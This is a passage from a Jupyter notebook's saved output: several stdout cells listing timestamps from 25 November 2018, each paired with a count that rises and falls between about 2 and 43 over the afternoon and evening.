"['2018-11-25 13:43:22.564207', 24]\n",
"['2018-11-25 13:43:45.623870', 25]\n",
"['2018-11-25 13:43:54.007335', 26]\n",
"['2018-11-25 13:44:12.648086', 25]\n",
"['2018-11-25 13:44:19.552733', 26]\n",
"['2018-11-25 13:45:28.989417', 27]\n",
"['2018-11-25 13:45:58.980124', 26]\n",
"['2018-11-25 13:46:01.681140', 27]\n",
"['2018-11-25 13:46:02.551777', 26]\n",
"['2018-11-25 13:46:06.378307', 25]\n",
"['2018-11-25 13:46:13.059634', 24]\n",
"['2018-11-25 13:46:40.178638', 23]\n",
"['2018-11-25 13:46:51.164694', 22]\n",
"['2018-11-25 13:46:57.114893', 23]\n",
"['2018-11-25 13:47:03.660928', 20]\n",
"['2018-11-25 13:47:05.167786', 19]\n",
"['2018-11-25 13:47:34.346662', 17]\n",
"['2018-11-25 13:47:48.256421', 16]\n",
"['2018-11-25 13:48:00.354169', 15]\n",
"['2018-11-25 13:48:07.298780', 14]\n",
"['2018-11-25 13:48:11.595029', 15]\n",
"['2018-11-25 13:48:23.395968', 12]\n",
"['2018-11-25 13:48:35.515404', 13]\n",
"['2018-11-25 13:48:45.520116', 14]\n",
"['2018-11-25 13:48:58.348789', 15]\n",
"['2018-11-25 13:49:10.179310', 16]\n",
"['2018-11-25 13:49:26.455526', 17]\n",
"['2018-11-25 13:50:03.666754', 15]\n",
"['2018-11-25 13:51:08.885988', 14]\n",
"['2018-11-25 13:51:10.563657', 15]\n",
"['2018-11-25 13:51:22.784626', 14]\n",
"['2018-11-25 13:51:30.178487', 15]\n",
"['2018-11-25 13:51:37.231909', 16]\n",
"['2018-11-25 13:52:38.988748', 15]\n",
"['2018-11-25 13:52:48.576223', 14]\n",
"['2018-11-25 13:52:59.177169', 13]\n",
"['2018-11-25 13:53:02.910389', 12]\n",
"['2018-11-25 13:53:10.871992', 11]\n",
"['2018-11-25 13:53:20.924972', 10]\n",
"['2018-11-25 13:53:40.110575', 11]\n",
"['2018-11-25 13:54:16.460167', 10]\n",
"['2018-11-25 13:54:21.381095', 11]\n",
"['2018-11-25 13:55:34.797498', 8]\n",
"['2018-11-25 14:02:23.012192', 3]\n",
"['2018-11-25 14:09:42.111730', 4]\n",
"['2018-11-25 14:10:20.452347', 5]\n",
"['2018-11-25 14:10:41.737067', 6]\n",
"['2018-11-25 14:11:31.620997', 7]\n",
"['2018-11-25 14:11:37.218761', 8]\n",
"['2018-11-25 14:11:40.655095', 9]\n",
"['2018-11-25 14:12:02.580485', 10]\n",
"['2018-11-25 14:13:08.268994', 11]\n",
"['2018-11-25 14:14:04.532615', 10]\n",
"['2018-11-25 14:15:41.938141', 7]\n",
"['2018-11-25 14:16:01.420456', 8]\n",
"['2018-11-25 14:16:03.876221', 9]\n",
"['2018-11-25 14:16:19.690247', 10]\n",
"['2018-11-25 14:16:20.870714', 11]\n",
"['2018-11-25 14:16:22.663749', 12]\n",
"['2018-11-25 14:16:22.724824', 13]\n",
"['2018-11-25 14:16:23.196224', 14]\n",
"['2018-11-25 14:16:27.529774', 15]\n",
"['2018-11-25 14:16:27.841627', 16]\n",
"['2018-11-25 14:16:29.983069', 17]\n",
"['2018-11-25 14:16:31.214274', 18]\n",
"['2018-11-25 14:16:41.841472', 19]\n",
"['2018-11-25 14:16:46.977387', 20]\n",
"['2018-11-25 14:16:51.175607', 21]\n",
"['2018-11-25 14:16:59.104383', 22]\n",
"['2018-11-25 14:17:00.513797', 23]\n",
"['2018-11-25 14:17:05.372374', 24]\n",
"['2018-11-25 14:17:07.453703', 25]\n",
"['2018-11-25 14:17:12.360612', 24]\n",
"['2018-11-25 14:17:19.741841', 23]\n",
"['2018-11-25 14:17:35.506325', 24]\n",
"['2018-11-25 14:17:36.174484', 25]\n",
"['2018-11-25 14:17:37.332507', 26]\n",
"['2018-11-25 14:18:12.814464', 27]\n",
"['2018-11-25 14:18:13.863292', 28]\n",
"['2018-11-25 14:18:16.676001', 29]\n",
"['2018-11-25 14:18:17.854732', 30]\n",
"['2018-11-25 14:19:23.770640', 31]\n",
"['2018-11-25 14:19:27.338040', 32]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 14:19:31.156130', 33]\n",
"['2018-11-25 14:19:55.971343', 32]\n",
"['2018-11-25 14:20:15.686638', 31]\n",
"['2018-11-25 14:20:20.556949', 32]\n",
"['2018-11-25 14:20:24.394946', 31]\n",
"['2018-11-25 14:20:36.366633', 32]\n",
"['2018-11-25 14:20:43.092658', 33]\n",
"['2018-11-25 14:20:46.402500', 34]\n",
"['2018-11-25 14:20:49.001153', 33]\n",
"['2018-11-25 14:20:59.202275', 32]\n",
"['2018-11-25 14:21:14.934248', 33]\n",
"['2018-11-25 14:21:22.982360', 34]\n",
"['2018-11-25 14:21:37.973052', 33]\n",
"['2018-11-25 14:22:02.219699', 32]\n",
"['2018-11-25 14:22:09.359296', 33]\n",
"['2018-11-25 14:22:17.876063', 32]\n",
"['2018-11-25 14:22:20.713961', 33]\n",
"['2018-11-25 14:22:40.032425', 34]\n",
"['2018-11-25 14:22:55.161990', 33]\n",
"['2018-11-25 14:22:59.061621', 34]\n",
"['2018-11-25 14:23:16.214253', 33]\n",
"['2018-11-25 14:23:28.033435', 32]\n",
"['2018-11-25 14:23:31.196545', 31]\n",
"['2018-11-25 14:23:44.904415', 32]\n",
"['2018-11-25 14:23:48.042247', 31]\n",
"['2018-11-25 14:24:11.260202', 30]\n",
"['2018-11-25 14:24:15.818732', 28]\n",
"['2018-11-25 14:24:17.969214', 27]\n",
"['2018-11-25 14:24:19.321039', 28]\n",
"['2018-11-25 14:24:24.853383', 27]\n",
"['2018-11-25 14:24:52.906654', 26]\n",
"['2018-11-25 14:24:58.083246', 25]\n",
"['2018-11-25 14:25:37.085893', 26]\n",
"['2018-11-25 14:25:42.579522', 27]\n",
"['2018-11-25 14:25:43.142780', 28]\n",
"['2018-11-25 14:25:57.356231', 29]\n",
"['2018-11-25 14:26:19.573491', 28]\n",
"['2018-11-25 14:26:51.480949', 29]\n",
"['2018-11-25 14:26:57.017580', 28]\n",
"['2018-11-25 14:27:07.378386', 29]\n",
"['2018-11-25 14:27:14.076851', 30]\n",
"['2018-11-25 14:27:15.255898', 31]\n",
"['2018-11-25 14:27:42.914014', 30]\n",
"['2018-11-25 14:28:08.306589', 29]\n",
"['2018-11-25 14:28:12.858617', 30]\n",
"['2018-11-25 14:29:36.805531', 20]\n",
"['2018-11-25 14:30:09.004379', 13]\n",
"['2018-11-25 14:30:18.369817', 12]\n",
"['2018-11-25 14:32:07.202474', 9]\n",
"['2018-11-25 14:32:14.956822', 4]\n",
"['2018-11-25 14:32:34.684062', 5]\n",
"['2018-11-25 14:33:31.971569', 6]\n",
"['2018-11-25 14:35:05.199022', 7]\n",
"['2018-11-25 14:35:13.557613', 8]\n",
"['2018-11-25 14:42:00.154995', 2]\n",
"['2018-11-25 14:43:29.386000', 3]\n",
"['2018-11-25 14:48:46.795093', 4]\n",
"['2018-11-25 14:49:59.881627', 3]\n",
"['2018-11-25 14:53:24.748425', 4]\n",
"['2018-11-25 14:53:47.184804', 5]\n",
"['2018-11-25 14:55:08.931557', 6]\n",
"['2018-11-25 14:59:13.745934', 3]\n",
"['2018-11-25 14:59:51.746604', 4]\n",
"['2018-11-25 15:01:23.843159', 5]\n",
"['2018-11-25 15:01:25.399194', 6]\n",
"['2018-11-25 15:01:26.930092', 7]\n",
"['2018-11-25 15:01:27.419303', 8]\n",
"['2018-11-25 15:01:30.294853', 9]\n",
"['2018-11-25 15:01:41.535220', 10]\n",
"['2018-11-25 15:01:47.600079', 11]\n",
"['2018-11-25 15:01:49.618320', 12]\n",
"['2018-11-25 15:02:05.882896', 13]\n",
"['2018-11-25 15:02:25.709629', 14]\n",
"['2018-11-25 15:02:31.952518', 15]\n",
"['2018-11-25 15:02:36.321661', 16]\n",
"['2018-11-25 15:02:48.391455', 17]\n",
"['2018-11-25 15:02:51.957636', 18]\n",
"['2018-11-25 15:03:07.437109', 19]\n",
"['2018-11-25 15:03:09.031298', 20]\n",
"['2018-11-25 15:03:15.081993', 19]\n",
"['2018-11-25 15:03:27.566362', 20]\n",
"['2018-11-25 15:03:35.575464', 21]\n",
"['2018-11-25 15:03:53.889515', 20]\n",
"['2018-11-25 15:04:03.607092', 21]\n",
"['2018-11-25 15:04:10.162891', 22]\n",
"['2018-11-25 15:04:35.298503', 23]\n",
"['2018-11-25 15:04:36.487215', 24]\n",
"['2018-11-25 15:05:13.429745', 25]\n",
"['2018-11-25 15:05:13.499098', 26]\n",
"['2018-11-25 15:05:22.066397', 25]\n",
"['2018-11-25 15:05:25.669331', 26]\n",
"['2018-11-25 15:05:52.583703', 24]\n",
"['2018-11-25 15:06:03.607051', 25]\n",
"['2018-11-25 15:06:32.811589', 26]\n",
"['2018-11-25 15:06:37.668454', 27]\n",
"['2018-11-25 15:06:42.714457', 28]\n",
"['2018-11-25 15:06:43.592486', 29]\n",
"['2018-11-25 15:06:49.842614', 30]\n",
"['2018-11-25 15:06:50.754577', 31]\n",
"['2018-11-25 15:07:04.096714', 30]\n",
"['2018-11-25 15:07:39.439029', 29]\n",
"['2018-11-25 15:07:51.759643', 30]\n",
"['2018-11-25 15:08:03.901677', 29]\n",
"['2018-11-25 15:08:07.131248', 30]\n",
"['2018-11-25 15:08:28.042438', 31]\n",
"['2018-11-25 15:08:32.391784', 30]\n",
"['2018-11-25 15:09:24.943420', 31]\n",
"['2018-11-25 15:09:54.309744', 30]\n",
"['2018-11-25 15:10:10.698681', 29]\n",
"['2018-11-25 15:10:12.285140', 30]\n",
"['2018-11-25 15:10:15.159688', 31]\n",
"['2018-11-25 15:10:15.703106', 32]\n",
"['2018-11-25 15:10:21.527341', 31]\n",
"['2018-11-25 15:10:44.497405', 30]\n",
"['2018-11-25 15:12:02.906794', 26]\n",
"['2018-11-25 15:13:10.549827', 20]\n",
"['2018-11-25 15:13:33.217106', 17]\n",
"['2018-11-25 15:13:52.429297', 13]\n",
"['2018-11-25 15:14:40.485367', 9]\n",
"['2018-11-25 15:15:19.984741', 5]\n",
"['2018-11-25 15:15:23.011141', 6]\n",
"['2018-11-25 15:23:01.089459', 4]\n",
"['2018-11-25 15:26:41.614612', 3]\n",
"['2018-11-25 15:27:41.745795', 2]\n",
"['2018-11-25 15:37:24.338561', 3]\n",
"['2018-11-25 15:38:10.578617', 4]\n",
"['2018-11-25 15:39:17.777974', 5]\n",
"['2018-11-25 15:41:22.335170', 6]\n",
"['2018-11-25 15:41:54.854899', 5]\n",
"['2018-11-25 15:43:36.598238', 4]\n",
"['2018-11-25 15:43:39.483488', 5]\n",
"['2018-11-25 15:43:57.722059', 6]\n",
"['2018-11-25 15:44:01.860659', 7]\n",
"['2018-11-25 15:44:07.121420', 8]\n",
"['2018-11-25 15:44:09.370716', 9]\n",
"['2018-11-25 15:44:11.468014', 10]\n",
"['2018-11-25 15:44:13.725426', 11]\n",
"['2018-11-25 15:44:15.880290', 12]\n",
"['2018-11-25 15:44:20.279596', 13]\n",
"['2018-11-25 15:44:24.518880', 14]\n",
"['2018-11-25 15:44:34.790011', 15]\n",
"['2018-11-25 15:44:35.969268', 16]\n",
"['2018-11-25 15:44:35.985210', 17]\n",
"['2018-11-25 15:44:37.946547', 18]\n",
"['2018-11-25 15:44:47.205140', 19]\n",
"['2018-11-25 15:44:50.008219', 20]\n",
"['2018-11-25 15:45:05.181733', 21]\n",
"['2018-11-25 15:45:06.212017', 22]\n",
"['2018-11-25 15:45:16.865297', 23]\n",
"['2018-11-25 15:45:20.190028', 24]\n",
"['2018-11-25 15:45:29.435841', 25]\n",
"['2018-11-25 15:45:30.371220', 26]\n",
"['2018-11-25 15:45:32.270608', 27]\n",
"['2018-11-25 15:45:40.271526', 28]\n",
"['2018-11-25 15:45:50.850364', 29]\n",
"['2018-11-25 15:46:28.474205', 28]\n",
"['2018-11-25 15:46:35.479323', 29]\n",
"['2018-11-25 15:46:59.018461', 30]\n",
"['2018-11-25 15:47:00.663861', 31]\n",
"['2018-11-25 15:47:05.093380', 32]\n",
"['2018-11-25 15:47:39.384698', 31]\n",
"['2018-11-25 15:47:41.339957', 30]\n",
"['2018-11-25 15:47:43.928071', 31]\n",
"['2018-11-25 15:48:04.803035', 32]\n",
"['2018-11-25 15:48:05.770927', 33]\n",
"['2018-11-25 15:48:09.445709', 32]\n",
"['2018-11-25 15:48:33.678132', 33]\n",
"['2018-11-25 15:48:41.389361', 30]\n",
"['2018-11-25 15:49:15.442730', 31]\n",
"['2018-11-25 15:49:30.467734', 30]\n",
"['2018-11-25 15:49:41.754564', 31]\n",
"['2018-11-25 15:49:58.615422', 30]\n",
"['2018-11-25 15:50:04.712450', 31]\n",
"['2018-11-25 15:50:35.339140', 32]\n",
"['2018-11-25 15:50:35.561231', 33]\n",
"['2018-11-25 15:50:41.924774', 32]\n",
"['2018-11-25 15:51:09.285654', 31]\n",
"['2018-11-25 15:51:19.167085', 32]\n",
"['2018-11-25 15:51:22.869853', 33]\n",
"['2018-11-25 15:51:42.623394', 32]\n",
"['2018-11-25 15:51:58.380815', 33]\n",
"['2018-11-25 15:52:18.094010', 32]\n",
"['2018-11-25 15:52:22.980125', 33]\n",
"['2018-11-25 15:52:29.154186', 32]\n",
"['2018-11-25 15:52:30.783736', 33]\n",
"['2018-11-25 15:52:59.417520', 32]\n",
"['2018-11-25 15:54:02.627613', 31]\n",
"['2018-11-25 15:54:10.849846', 30]\n",
"['2018-11-25 15:54:27.926964', 31]\n",
"['2018-11-25 15:54:35.940834', 30]\n",
"['2018-11-25 15:54:46.128781', 29]\n",
"['2018-11-25 15:54:47.398911', 30]\n",
"['2018-11-25 15:54:53.362041', 29]\n",
"['2018-11-25 15:54:59.572596', 30]\n",
"['2018-11-25 15:55:25.060683', 31]\n",
"['2018-11-25 15:55:31.201785', 30]\n",
"['2018-11-25 15:55:37.177376', 29]\n",
"['2018-11-25 15:55:47.408583', 26]\n",
"['2018-11-25 15:56:05.236846', 25]\n",
"['2018-11-25 15:56:34.212321', 22]\n",
"['2018-11-25 15:57:04.250070', 21]\n",
"['2018-11-25 15:57:37.668628', 22]\n",
"['2018-11-25 15:57:45.678177', 21]\n",
"['2018-11-25 15:58:23.641663', 18]\n",
"['2018-11-25 15:59:46.283572', 8]\n",
"['2018-11-25 15:59:51.265710', 7]\n",
"['2018-11-25 16:00:06.260006', 6]\n",
"['2018-11-25 16:00:20.174774', 7]\n",
"['2018-11-25 16:00:20.640606', 8]\n",
"['2018-11-25 16:00:31.007190', 9]\n",
"['2018-11-25 16:01:11.402754', 10]\n",
"['2018-11-25 16:01:49.016424', 9]\n",
"['2018-11-25 16:01:59.701956', 10]\n",
"['2018-11-25 16:02:32.293083', 8]\n",
"['2018-11-25 16:04:28.842118', 7]\n",
"['2018-11-25 16:04:29.677989', 8]\n",
"['2018-11-25 16:04:59.724256', 7]\n",
"['2018-11-25 16:05:13.845577', 5]\n",
"['2018-11-25 16:06:21.940831', 6]\n",
"['2018-11-25 16:10:26.171296', 5]\n",
"['2018-11-25 16:11:39.341196', 4]\n",
"['2018-11-25 16:16:49.308357', 2]\n",
"['2018-11-25 16:21:00.611467', 3]\n",
"['2018-11-25 16:24:50.079451', 4]\n",
"['2018-11-25 16:25:12.797771', 3]\n",
"['2018-11-25 16:27:02.407166', 4]\n",
"['2018-11-25 16:27:48.470771', 5]\n",
"['2018-11-25 16:29:33.536880', 4]\n",
"['2018-11-25 16:29:59.326275', 5]\n",
"['2018-11-25 16:30:32.998582', 6]\n",
"['2018-11-25 16:30:59.527810', 7]\n",
"['2018-11-25 16:31:11.710984', 8]\n",
"['2018-11-25 16:31:16.724425', 9]\n",
"['2018-11-25 16:31:19.046962', 10]\n",
"['2018-11-25 16:31:22.050949', 11]\n",
"['2018-11-25 16:31:28.560866', 10]\n",
"['2018-11-25 16:31:30.759947', 11]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 16:31:34.652979', 12]\n",
"['2018-11-25 16:31:37.863574', 13]\n",
"['2018-11-25 16:31:46.397925', 14]\n",
"['2018-11-25 16:31:49.278903', 15]\n",
"['2018-11-25 16:31:54.802112', 16]\n",
"['2018-11-25 16:32:24.763460', 17]\n",
"['2018-11-25 16:32:26.770996', 18]\n",
"['2018-11-25 16:32:29.282421', 19]\n",
"['2018-11-25 16:33:07.271964', 20]\n",
"['2018-11-25 16:33:18.662266', 21]\n",
"['2018-11-25 16:34:00.152404', 20]\n",
"['2018-11-25 16:34:30.476697', 21]\n",
"['2018-11-25 16:34:46.387293', 20]\n",
"['2018-11-25 16:35:04.457977', 21]\n",
"['2018-11-25 16:35:50.109793', 22]\n",
"['2018-11-25 16:36:14.865590', 23]\n",
"['2018-11-25 16:36:45.288882', 24]\n",
"['2018-11-25 16:37:00.658086', 25]\n",
"['2018-11-25 16:37:17.265279', 26]\n",
"['2018-11-25 16:37:21.724588', 27]\n",
"['2018-11-25 16:37:39.641386', 26]\n",
"['2018-11-25 16:37:43.986356', 27]\n",
"['2018-11-25 16:37:46.715032', 28]\n",
"['2018-11-25 16:38:26.767366', 27]\n",
"['2018-11-25 16:39:17.153861', 25]\n",
"['2018-11-25 16:39:30.591688', 26]\n",
"['2018-11-25 16:39:34.710597', 27]\n",
"['2018-11-25 16:40:14.052870', 25]\n",
"['2018-11-25 16:40:15.644637', 26]\n",
"['2018-11-25 16:42:07.882519', 19]\n",
"['2018-11-25 16:42:08.034244', 20]\n",
"['2018-11-25 16:42:15.866477', 21]\n",
"['2018-11-25 16:42:22.857860', 20]\n",
"['2018-11-25 16:42:26.273265', 21]\n",
"['2018-11-25 16:42:28.317345', 22]\n",
"['2018-11-25 16:42:51.556773', 23]\n",
"['2018-11-25 16:42:58.319922', 22]\n",
"['2018-11-25 16:43:01.495119', 23]\n",
"['2018-11-25 16:43:07.787776', 22]\n",
"['2018-11-25 16:43:25.988289', 23]\n",
"['2018-11-25 16:43:46.571196', 22]\n",
"['2018-11-25 16:43:50.626006', 21]\n",
"['2018-11-25 16:44:01.272437', 20]\n",
"['2018-11-25 16:44:18.825371', 16]\n",
"['2018-11-25 16:44:23.830925', 15]\n",
"['2018-11-25 16:46:01.286227', 9]\n",
"['2018-11-25 16:47:05.163468', 7]\n",
"['2018-11-25 16:47:27.259426', 6]\n",
"['2018-11-25 16:48:05.273049', 3]\n",
"['2018-11-25 16:49:01.225703', 4]\n",
"['2018-11-25 16:51:43.730699', 3]\n",
"['2018-11-25 17:06:01.363591', 2]\n",
"['2018-11-25 17:06:52.248373', 3]\n",
"['2018-11-25 17:08:04.639661', 4]\n",
"['2018-11-25 17:08:50.033301', 5]\n",
"['2018-11-25 17:09:59.695603', 6]\n",
"['2018-11-25 17:11:00.113011', 5]\n",
"['2018-11-25 17:11:00.626685', 6]\n",
"['2018-11-25 17:11:18.499672', 7]\n",
"['2018-11-25 17:11:24.021596', 8]\n",
"['2018-11-25 17:12:13.199751', 9]\n",
"['2018-11-25 17:13:05.251593', 10]\n",
"['2018-11-25 17:13:20.858384', 11]\n",
"['2018-11-25 17:13:33.812410', 10]\n",
"['2018-11-25 17:14:02.001165', 11]\n",
"['2018-11-25 17:14:19.555421', 12]\n",
"['2018-11-25 17:15:39.336945', 11]\n",
"['2018-11-25 17:16:10.983772', 12]\n",
"['2018-11-25 17:16:29.487852', 13]\n",
"['2018-11-25 17:16:31.329230', 14]\n",
"['2018-11-25 17:16:36.947712', 13]\n",
"['2018-11-25 17:16:37.134547', 14]\n",
"['2018-11-25 17:16:39.353228', 15]\n",
"['2018-11-25 17:16:40.893073', 16]\n",
"['2018-11-25 17:16:41.082396', 17]\n",
"['2018-11-25 17:16:42.846544', 18]\n",
"['2018-11-25 17:16:44.522018', 19]\n",
"['2018-11-25 17:16:45.523793', 20]\n",
"['2018-11-25 17:16:46.924433', 21]\n",
"['2018-11-25 17:16:48.805022', 22]\n",
"['2018-11-25 17:16:49.651219', 23]\n",
"['2018-11-25 17:17:10.553619', 24]\n",
"['2018-11-25 17:17:12.669044', 25]\n",
"['2018-11-25 17:17:24.837912', 24]\n",
"['2018-11-25 17:17:43.952482', 25]\n",
"['2018-11-25 17:18:01.936829', 26]\n",
"['2018-11-25 17:18:17.138060', 27]\n",
"['2018-11-25 17:18:23.797907', 28]\n",
"['2018-11-25 17:18:31.117943', 27]\n",
"['2018-11-25 17:18:52.215904', 28]\n",
"['2018-11-25 17:18:55.827089', 29]\n",
"['2018-11-25 17:19:18.639143', 30]\n",
"['2018-11-25 17:19:18.909032', 31]\n",
"['2018-11-25 17:19:22.625258', 30]\n",
"['2018-11-25 17:19:42.308508', 29]\n",
"['2018-11-25 17:20:10.533839', 28]\n",
"['2018-11-25 17:20:15.991040', 27]\n",
"['2018-11-25 17:20:33.181901', 28]\n",
"['2018-11-25 17:20:37.683859', 29]\n",
"['2018-11-25 17:20:39.674509', 30]\n",
"['2018-11-25 17:20:41.347097', 31]\n",
"['2018-11-25 17:21:03.263032', 32]\n",
"['2018-11-25 17:21:10.533179', 31]\n",
"['2018-11-25 17:21:33.320142', 30]\n",
"['2018-11-25 17:21:41.818638', 29]\n",
"['2018-11-25 17:22:08.767107', 30]\n",
"['2018-11-25 17:22:18.651864', 29]\n",
"['2018-11-25 17:22:32.707304', 28]\n",
"['2018-11-25 17:22:36.559611', 29]\n",
"['2018-11-25 17:22:39.146095', 28]\n",
"['2018-11-25 17:22:39.355644', 29]\n",
"['2018-11-25 17:22:58.051719', 28]\n",
"['2018-11-25 17:23:22.453904', 29]\n",
"['2018-11-25 17:24:02.661534', 30]\n",
"['2018-11-25 17:24:34.323819', 29]\n",
"['2018-11-25 17:24:40.474901', 30]\n",
"['2018-11-25 17:24:43.475550', 28]\n",
"['2018-11-25 17:25:14.643776', 29]\n",
"['2018-11-25 17:25:29.634551', 28]\n",
"['2018-11-25 17:25:50.869910', 29]\n",
"['2018-11-25 17:27:31.689927', 24]\n",
"['2018-11-25 17:28:45.831833', 21]\n",
"['2018-11-25 17:29:29.188301', 10]\n",
"['2018-11-25 17:29:51.964862', 8]\n",
"['2018-11-25 17:30:21.957025', 6]\n",
"['2018-11-25 17:31:12.563133', 7]\n",
"['2018-11-25 17:35:26.713227', 5]\n",
"['2018-11-25 17:35:31.957244', 6]\n",
"['2018-11-25 17:35:40.690950', 5]\n",
"['2018-11-25 17:36:16.691089', 3]\n",
"['2018-11-25 17:36:29.467386', 4]\n",
"['2018-11-25 17:44:19.924858', 2]\n",
"['2018-11-25 17:47:45.544428', 3]\n",
"['2018-11-25 17:52:23.016316', 2]\n",
"['2018-11-25 17:55:55.921996', 3]\n",
"['2018-11-25 17:56:44.191981', 2]\n",
"['2018-11-25 17:56:54.908898', 3]\n",
"['2018-11-25 17:57:14.432908', 4]\n",
"['2018-11-25 17:57:49.383284', 5]\n",
"['2018-11-25 17:57:50.240867', 6]\n",
"['2018-11-25 17:58:09.180497', 7]\n",
"['2018-11-25 17:58:21.542782', 8]\n",
"['2018-11-25 17:59:05.124154', 9]\n",
"['2018-11-25 17:59:59.579968', 10]\n",
"['2018-11-25 18:00:19.674515', 11]\n",
"['2018-11-25 18:00:25.116237', 12]\n",
"['2018-11-25 18:00:28.558219', 13]\n",
"['2018-11-25 18:00:29.813583', 14]\n",
"['2018-11-25 18:00:30.235621', 15]\n",
"['2018-11-25 18:00:33.490992', 16]\n",
"['2018-11-25 18:00:35.191292', 17]\n",
"['2018-11-25 18:00:36.841324', 18]\n",
"['2018-11-25 18:00:39.254371', 19]\n",
"['2018-11-25 18:00:49.831184', 20]\n",
"['2018-11-25 18:00:50.888211', 21]\n",
"['2018-11-25 18:00:50.896014', 22]\n",
"['2018-11-25 18:00:51.072296', 23]\n",
"['2018-11-25 18:01:01.349005', 24]\n",
"['2018-11-25 18:01:09.745197', 25]\n",
"['2018-11-25 18:01:10.544401', 26]\n",
"['2018-11-25 18:01:11.337997', 27]\n",
"['2018-11-25 18:01:15.376911', 26]\n",
"['2018-11-25 18:01:17.331666', 27]\n",
"['2018-11-25 18:01:18.077658', 28]\n",
"['2018-11-25 18:01:20.087545', 29]\n",
"['2018-11-25 18:01:22.240882', 30]\n",
"['2018-11-25 18:01:23.899923', 31]\n",
"['2018-11-25 18:01:25.397813', 32]\n",
"['2018-11-25 18:01:35.146595', 33]\n",
"['2018-11-25 18:01:39.377132', 34]\n",
"['2018-11-25 18:01:49.154278', 35]\n",
"['2018-11-25 18:01:51.350380', 34]\n",
"['2018-11-25 18:01:55.524599', 35]\n",
"['2018-11-25 18:02:14.004277', 36]\n",
"['2018-11-25 18:02:32.236259', 37]\n",
"['2018-11-25 18:02:34.701388', 38]\n",
"['2018-11-25 18:03:01.844211', 37]\n",
"['2018-11-25 18:03:03.089000', 38]\n",
"['2018-11-25 18:03:06.079750', 37]\n",
"['2018-11-25 18:03:32.621183', 36]\n",
"['2018-11-25 18:04:09.455366', 37]\n",
"['2018-11-25 18:04:25.365172', 36]\n",
"['2018-11-25 18:04:30.042626', 35]\n",
"['2018-11-25 18:04:31.878183', 36]\n",
"['2018-11-25 18:04:36.781908', 35]\n",
"['2018-11-25 18:05:01.201787', 34]\n",
"['2018-11-25 18:05:16.137970', 33]\n",
"['2018-11-25 18:05:45.192573', 31]\n",
"['2018-11-25 18:06:24.037899', 32]\n",
"['2018-11-25 18:06:31.847098', 31]\n",
"['2018-11-25 18:06:34.902177', 30]\n",
"['2018-11-25 18:06:36.995001', 31]\n",
"['2018-11-25 18:06:37.359634', 32]\n",
"['2018-11-25 18:06:45.192533', 31]\n",
"['2018-11-25 18:06:49.728615', 32]\n",
"['2018-11-25 18:06:56.682361', 33]\n",
"['2018-11-25 18:06:59.230254', 34]\n",
"['2018-11-25 18:07:07.160940', 33]\n",
"['2018-11-25 18:07:10.547946', 32]\n",
"['2018-11-25 18:07:12.156615', 33]\n",
"['2018-11-25 18:07:12.531398', 34]\n",
"['2018-11-25 18:07:13.601333', 35]\n",
"['2018-11-25 18:07:20.089824', 36]\n",
"['2018-11-25 18:07:23.470589', 35]\n",
"['2018-11-25 18:07:33.401341', 34]\n",
"['2018-11-25 18:07:54.096647', 33]\n",
"['2018-11-25 18:08:03.289867', 34]\n",
"['2018-11-25 18:08:03.877416', 35]\n",
"['2018-11-25 18:08:04.163027', 36]\n",
"['2018-11-25 18:08:11.069745', 37]\n",
"['2018-11-25 18:08:17.755495', 38]\n",
"['2018-11-25 18:08:21.161547', 37]\n",
"['2018-11-25 18:08:28.545692', 38]\n",
"['2018-11-25 18:08:30.101235', 37]\n",
"['2018-11-25 18:08:31.904885', 36]\n",
"['2018-11-25 18:08:37.771374', 37]\n",
"['2018-11-25 18:09:18.153794', 38]\n",
"['2018-11-25 18:09:22.375198', 39]\n",
"['2018-11-25 18:09:55.914851', 40]\n",
"['2018-11-25 18:10:06.515293', 41]\n",
"['2018-11-25 18:10:06.899866', 42]\n",
"['2018-11-25 18:10:14.496809', 43]\n",
"['2018-11-25 18:10:32.954886', 42]\n",
"['2018-11-25 18:10:56.842640', 41]\n",
"['2018-11-25 18:13:10.363139', 27]\n",
"['2018-11-25 18:13:18.245307', 24]\n",
"['2018-11-25 18:13:50.207707', 19]\n",
"['2018-11-25 18:14:22.457151', 12]\n",
"['2018-11-25 18:16:19.911555', 6]\n",
"['2018-11-25 18:16:25.920103', 7]\n",
"['2018-11-25 18:16:28.061653', 8]\n",
"['2018-11-25 18:16:47.107364', 9]\n",
"['2018-11-25 18:17:13.545408', 8]\n",
"['2018-11-25 18:18:24.992685', 7]\n",
"['2018-11-25 18:19:02.211539', 8]\n",
"['2018-11-25 18:19:27.014343', 9]\n",
"['2018-11-25 18:20:04.817249', 10]\n",
"['2018-11-25 18:20:31.006331', 8]\n",
"['2018-11-25 18:20:58.966752', 7]\n",
"['2018-11-25 18:21:32.962738', 8]\n",
"['2018-11-25 18:21:37.429186', 9]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 18:22:32.647325', 7]\n",
"['2018-11-25 18:23:15.103406', 8]\n",
"['2018-11-25 18:24:14.591404', 6]\n",
"['2018-11-25 18:36:10.849821', 2]\n",
"['2018-11-25 18:37:59.088205', 3]\n",
"['2018-11-25 18:43:41.157184', 4]\n",
"['2018-11-25 18:44:27.486279', 5]\n",
"['2018-11-25 18:45:20.427792', 6]\n",
"['2018-11-25 18:45:20.938091', 7]\n",
"['2018-11-25 18:45:34.255212', 6]\n",
"['2018-11-25 18:45:55.251275', 7]\n",
"['2018-11-25 18:46:26.542160', 8]\n",
"['2018-11-25 18:47:04.594881', 9]\n",
"['2018-11-25 18:47:30.854336', 10]\n",
"['2018-11-25 18:47:39.558746', 11]\n",
"['2018-11-25 18:47:46.402209', 12]\n",
"['2018-11-25 18:47:59.619865', 13]\n",
"['2018-11-25 18:48:03.683410', 14]\n",
"['2018-11-25 18:48:10.556976', 15]\n",
"['2018-11-25 18:48:17.625459', 16]\n",
"['2018-11-25 18:48:20.462706', 17]\n",
"['2018-11-25 18:48:45.711867', 15]\n",
"['2018-11-25 18:48:53.002299', 16]\n",
"['2018-11-25 18:49:07.214368', 17]\n",
"['2018-11-25 18:49:15.708604', 18]\n",
"['2018-11-25 18:49:33.897351', 19]\n",
"['2018-11-25 18:50:43.041125', 18]\n",
"['2018-11-25 18:50:51.840763', 17]\n",
"['2018-11-25 18:51:06.423211', 16]\n",
"['2018-11-25 18:51:17.983959', 17]\n",
"['2018-11-25 18:51:20.046080', 18]\n",
"['2018-11-25 18:51:33.324018', 17]\n",
"['2018-11-25 18:52:08.633624', 16]\n",
"['2018-11-25 18:52:20.689886', 17]\n",
"['2018-11-25 18:52:27.453322', 18]\n",
